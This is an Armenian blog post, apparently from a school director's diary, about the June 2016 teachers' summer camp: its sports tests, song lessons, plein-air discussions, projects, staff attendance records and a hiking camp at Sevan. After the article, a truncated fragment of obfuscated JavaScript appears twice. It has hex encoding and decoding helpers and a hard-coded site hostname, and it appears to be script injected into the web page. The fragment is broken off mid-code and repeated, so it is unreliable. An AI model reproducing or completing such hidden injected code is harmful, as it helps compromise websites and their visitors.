«Ամառ 2016» նախագծով հերթական ճամբարը, որ սկսում է հունիսի 20-ին, հեղինակային կրթական ծրագրի՝ մոբիլության, ստեղծականության, ներառականության դրսևորման-ապահովման, մանկավարժական աշխատողին անհրաժեշտ ընդհանուր հմտությունների փոխանցման հարթակ է։ Իմ օրվա գիրը կարդացեք՝ որպես այս սուրհանդակի մաս։ Մանկավարժության լաբորատորիան հրապարակել է ճամբարի կազմակերպումը և առաջին օրվա ծրագիրը։ Անհրաժեշտ եմ համարում մեկնաբանել-լրացնել։ Ծրագիրը կազմված է մի քանի մասից։

  • Մարզական պարապմունքներից ընտրված են մարմնամարզությունը, վազքը, լողի և հեծանվավարության ստուգարքները՝ կարևորելով սովորողների մարզական-արշավախմբային գործունեության կազմակերպման հմտությունները, ֆիզիկական միջավայրում անվտանգ գործունեության պահանջը։ Այո, կարևոր է, որ հեղինակային կրթական ծրագիրը կազմակերպող մանկավարժական յուրաքանչյուր աշխատողը մարզական լինի, ունենա մարզական-արշավային հանդերձանք-այլ պարագաներ, դրսևորի լողորդի, հեծանվորդի, արշավորդի հմտություններ։
  • Առավոտյան ընդհանուր պարապմունքին նախատեսվում է նոր երգերի, պարերի ուսուցում։
  • Բանգլադեշյան ամենամյա պլեներ 2016-ի արդյունքները ներկայացնել-քննարկել-գնահատելը յուրաքանչյուրի գործն է, որովհետև հագեցած պլեներային շաբաթը շատ բաներ թողել է աննկատ, չգնահատված. ստուգատեսներին չներկայացված. նաև ստուգատես չհասած աշխատանքների մասին պետք է խոսել: Այս քննարկումները ոչ միայն Բանգլադեշյան պլեներ 2017-ի, այլ նաև 2016-2017 ուսումնական տարվա մյուս ստուգատեսների կազմակերպմանը գաղափարներ-առաջարկներ կբերեն։
  • Ուսումնական մյուս պարապմունքները նախաձեռնություններ են՝ կոնկրետ, ուղղված են կրթական ծրագրերի 2016-2017-ի կազմակերպմանը։
  • Ուսումնական նախագծերը մանկավարժական աշխատողների լրացուցիչ կրթությունն են ապահովում, հավեսի, ստեղծականության, հետաքրքրությունների բավարարման հարթակ են։ Մարիետ Սիմոնյանը նախաձեռնողների խմբի հետ հրապարակել է նախագծերը, առաջարկեք էլի, նոր խմբեր կազմեք. հունիսի 20-23-ը սկիզբն է, նախագծերը կշարունակվե՞ն մինչև ամառվա վերջը։
  • Կրթահամալիր դիմող մասնագետները ժամը 13.00-ից կազմում են նախագծային առանձին ջոկատ, որտեղ նրանց կփոխանցվեն աանհրաժեշտ տեխնոլոգիական հմտությունները։
  • Ընդմիջումը ամենուր նույն սկզբունքով է կազմակերպվում՝ բրդուճային, ամառային, թեթև, ուրախ։
  • Ուրբաթ-շաբաթ-կիրակի արտագնա արշավախմբային-վրանային ճամբարն է Սևանի «Ժայռում», միասին քայլելու, լողալու, վերելքի, հայրենագիտական արշավների օրեր։

Մանկավարժական աշխատողների մասնակցության հաշվառումն արվում է դպրոցներում, պատասխանատուները գրանցում են մասնակցության արդյունքները և փոխանցում կրթահամալիրի տնօրենի գրասենյակ՝ կադրերի տեսուչին, որպեսզի աշխատողի անհատական գործում գրանցի։ Ջոկատների ղեկավարները ամեն օրվա և գործունեության համար թող հրապարակեն-ներկայացնեն ցուցակները` նկատի ունենալով նրանց, որ արդեն արձակուրդում են, որ դպրոցում-կրթահամալիրում այլ աշխատանք ունեն, ինչպես սովորողների ջոկատի-ճամբարի-նախագծի ղեկավարում, քննական կենտրոնում աշխատանք, այլ աշխատանք։ Ոչ մի աշխատանք հաշվառումից դուրս չի կարող մնալ։

Ջոկատների հարգելի ղեկավարներ, հրապարակեք նաև դպրոցների, քոլեջի 2016-2017 ուսումնական տարվա ընդունելության կազմակերպման հունիսի 20-25-ի նախագիծը` իր աշխատակարգով,  ընդունելության անկյուններով, դրանց պատասխանատուներով-հերթապահներով, նրանց աշխատանքով։

Մանկավարժության ճամբարը ձևականություն-արհեստականությունը հաղթահարելու, տարին չորս անգամ ուսուցիչների մանկավարժական զարգացմանը կազմակերպում տալու հարմար հարթակ է։  Հիշեցնում եմ, որ ճամբարը բաց է, լավ կլինի, որ այստեղ էլ գործի Միջին դպրոցի ճամբարի «1+1» սկզբունքը։

Դպրոցներում շարունակում են գործել ամառային պարտեզներն ու լողափնյա ճամբարները, մանկավարժության ճամբարի մասնակիցների երեխաներն ընդգրկվում են այդ ճամբարներում։

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Ուսումնական տարվա մեկնարկից առաջ

Կրթահամալիրի ուսումնական օրացույցով 2017-2018 ուսումնական տարին մեկնարկում է օգոստոսի 30-ի մարզատոն-հայրենագիտական-արշավախմբային գործունեության-ճամփորդությամբ ուսուցման ստուգատեսով։ Այս նպատակով անհրաժեշտ եմ համարում հիշեցնել, որ հեղինակային կրթական ծրագրի մանկավարժական աշխատողը ստուգատեսին մասնակցում է որպես

Սեպտեմբերի 4-8-ի նախագծային ուսուցման շաբաթը կրթահամալիրի տնօրենի օրագրում

2017-2018-ի մեր սեբաստացիական մուտքը ինձ հիացնում է… Ինչպես և սեպտեմբերի 4-ից սկսվող նախագծային ուսուցման շաբաթը, ողջ ուսումնական տարվա վրա մի յուրայինի հայացք գցելու, անցնելիք ճանապարհը, որպես հաջող մեկնարկ, անհատական մի

Աշխատանքային ճամփորդություն Օշական

Կրթահամալիրի ուսումնական օրացույցով որոշված ամսիկները, ասել եմ, այսուհետ նաև 6 տարեկանների ուսումնական կարողությունների ձևավորման-զարգացման, մեկամսյա ուսումնական աշխատանքի արդյունքների ներկայացման ստուգատեսներ են։ Եվ դրանք գործունեության մյուս ձևերի հետ պարունակելու են ճամփորդությամբ